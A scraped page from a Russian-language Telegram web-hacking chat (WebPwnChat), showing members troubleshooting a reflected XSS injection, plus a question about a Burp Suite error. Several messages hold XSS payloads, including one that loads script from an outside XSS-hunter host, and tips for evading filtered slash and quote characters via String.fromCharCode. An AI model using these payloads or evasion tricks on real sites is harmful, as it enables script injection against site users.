В рейтинге участвует:

групп:

каналов:

Виртуальный сервер на SSD - недорого!

Аренда выделенных и виртуальных серверов (VDS/VPS), хостинг, аренда IP-адресов, администрирование, круглосуточная поддержка

qwarta.ru подробнее

Резервное копирование с проверкой на вирусы!!!

Удобный сервис создания резервных копий на любой сервер сети интернет. Отслеживайте изменения, проверяйте на вирусы. Надежно защитите свой бизнес!

go.backupland.com

Выбираете сервер? Любая конфигурация на заказ!

Аренда физических серверов любых конфигураций под любые запросы - 1С бухгалтерия, игровые сервера, нагруженные проекты, интернет-магазины!

qwarta.ru подробнее

Size: a a a

WebPwnChat

979 membersпожаловаться на группу
2020 April 20

А

Алексей in WebPwnChat
自閉症のポイント
Ну $getscript(//ad.xss.ht)
А оно разве в скрипт не должно быть обернуто?
источник
02:55пожаловаться#1

А

Алексей in WebPwnChat
Внутри <br> отработает просто так?
источник
02:55пожаловаться#2

自閉症のポイント in WebPwnChat
Так я понял это в js инъект, раз там без обертки рефлектит
источник
02:56пожаловаться#3

в

вжух in WebPwnChat
да, это так. Ввожу '-alert()-' - алерт есть, ввожу код выше импорт - 404
источник
02:56пожаловаться#4

M

Max in WebPwnChat
вжух
да, это так. Ввожу '-alert()-' - алерт есть, ввожу код выше импорт - 404
Тогда изучай, какие символы мешают.
источник
02:57пожаловаться#5

в

вжух in WebPwnChat
Max
Тогда изучай, какие символы мешают.
уже нашел, спасибо за совет. это / и "
источник
02:57пожаловаться#6

в

вжух in WebPwnChat
анреал походу, только если так '-import(sss.sss)-' лол
источник
02:58пожаловаться#7

M

Max in WebPwnChat
экранируй кавычки?
источник
02:59пожаловаться#8

в

вжух in WebPwnChat
а смысл, он не принимает /
источник
02:59пожаловаться#9

в

вжух in WebPwnChat
без него нельзя подгрузить скрипт с сайта
источник
02:59пожаловаться#10

M

Max in WebPwnChat
Можно)
источник
02:59пожаловаться#11

в

вжух in WebPwnChat
как...
источник
02:59пожаловаться#12

M

Max in WebPwnChat
В содержимое строки ты можешь вставить что угодно, по коду.
источник
03:00пожаловаться#13

A

Anton in WebPwnChat
http:host
источник
03:00пожаловаться#14

в

вжух in WebPwnChat
такс спасибо ребята
источник
03:00пожаловаться#15

в

вжух in WebPwnChat
опа имба
источник
03:00пожаловаться#16

M

Max in WebPwnChat
https://developer.mozilla.org/ru/docs/Web/JavaScript/Reference/Global_Objects/String/fromCharCode
Веб-документация MDN
String.fromCharCode()
Статический метод String.fromCharCode() возвращает строку, созданную из указанной последовательности значений единиц кода UTF-16.
источник
03:00пожаловаться#17

в

вжух in WebPwnChat
спасибо всем ❤️
источник
03:00пожаловаться#18

АН

Алекс Ньювейв in WebPwnChat
Пацаны, сто пудов тут кто-то с макоси бурп юзает…
Меня заебала ошибка received fatal alert: record_overflow при большом POST запросе.
Гуглил решение, на форуме бурпа - проблема якобы решена в 2020.1, а у меня 2020.2.1 и все равно такая дичь...
источник
03:37пожаловаться#19

P

Pulsar in WebPwnChat
лицензионный или кряк?
источник
03:38пожаловаться#20